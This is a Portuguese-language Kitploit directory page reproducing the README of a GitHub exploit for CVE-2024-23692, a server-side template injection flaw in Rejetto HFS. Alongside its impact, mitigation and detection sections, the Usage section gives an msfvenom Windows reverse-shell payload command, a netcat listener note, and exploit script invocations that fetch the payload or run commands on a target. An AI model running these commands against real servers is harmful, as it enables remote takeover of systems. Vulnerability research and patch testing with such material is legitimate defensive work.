Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) é um servidor de arquivos web simples que facilita o compartilhamento de arquivos através de uma rede ou da internet. | Kitploit
Ferramentas/GitHubGitHub/mr-r00t11/cve-2024-23692
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) é um servidor de arquivos web simples que facilita o compartilhamento de arquivos através de uma rede ou da internet.

Ver Repositório
13há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade Rejetto HFS (HTTP File Server) CVE-2024-23692


Visão Geral

Rejetto HFS (HTTP File Server) é um servidor de arquivos web simples que facilita o compartilhamento de arquivos através de uma rede ou da internet. Apesar de sua facilidade de uso e simplicidade, uma vulnerabilidade crítica (CVE-2024-23692) foi descoberta, tornando o servidor um alvo para atacantes.


CVE-2024-23692: Vulnerabilidade de Injeção de Template no Lado do Servidor (SSTI)


Descrição

CVE-2024-23692 é uma vulnerabilidade de Injeção de Template no Lado do Servidor (SSTI) identificada no Rejetto HFS. Essa vulnerabilidade permite que um atacante injete e execute templates maliciosos no servidor. Se explorada, pode levar à execução remota de código, potencialmente comprometendo todo o servidor e os dados que ele hospeda.


Impacto

Um atacante que explore esta vulnerabilidade pode:

  • Executar código arbitrário no servidor
  • Obter acesso não autorizado a dados sensíveis
  • Comprometer a integridade e disponibilidade do servidor
  • Usar o servidor comprometido para lançar ataques adicionais dentro da rede

Uso

Obtenha um shell usando um binário malicioso criado com msfvenom.

Nota: Deixe o nc ouvindo.

# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Execute um comando remotamente.

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

Pode levar aproximadamente 15 segundos para exibir o resultado.

[Screenshot_2.png]


Versões Afetadas

Todas as versões do Rejetto HFS até e incluindo a versão [insira aqui a versão vulnerável mais recente] são afetadas por esta vulnerabilidade.


Mitigação

Para mitigar o risco representado pelo CVE-2024-23692, os usuários são aconselhados a:

  • Atualize para a versão mais recente: Certifique-se de estar usando uma versão do Rejetto HFS onde esta vulnerabilidade foi corrigida. Verifique o site oficial ou repositório do Rejetto HFS para as atualizações mais recentes.
  • Aplique as Melhores Práticas de Segurança: Restrinja o acesso ao servidor HFS apenas a redes e usuários confiáveis. Use mecanismos fortes de autenticação e autorização.
  • Monitore e Audite: Monitore regularmente o servidor para atividades incomuns e audite logs em busca de sinais de exploração.

Detecção

Para determinar se seu servidor foi comprometido, procure por:

  • Tráfego de rede incomum originado do servidor
  • Arquivos ou processos inesperados no servidor
  • Alterações não autorizadas nas configurações ou dados do servidor

Relatório e Assistência

Para mais assistência e suporte, consulte os fóruns da comunidade do Rejetto HFS ou os canais oficiais de suporte.


Recursos

  • Site Oficial do Rejetto HFS
  • Detalhes do CVE-2024-23692

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.


Baixar ferramenta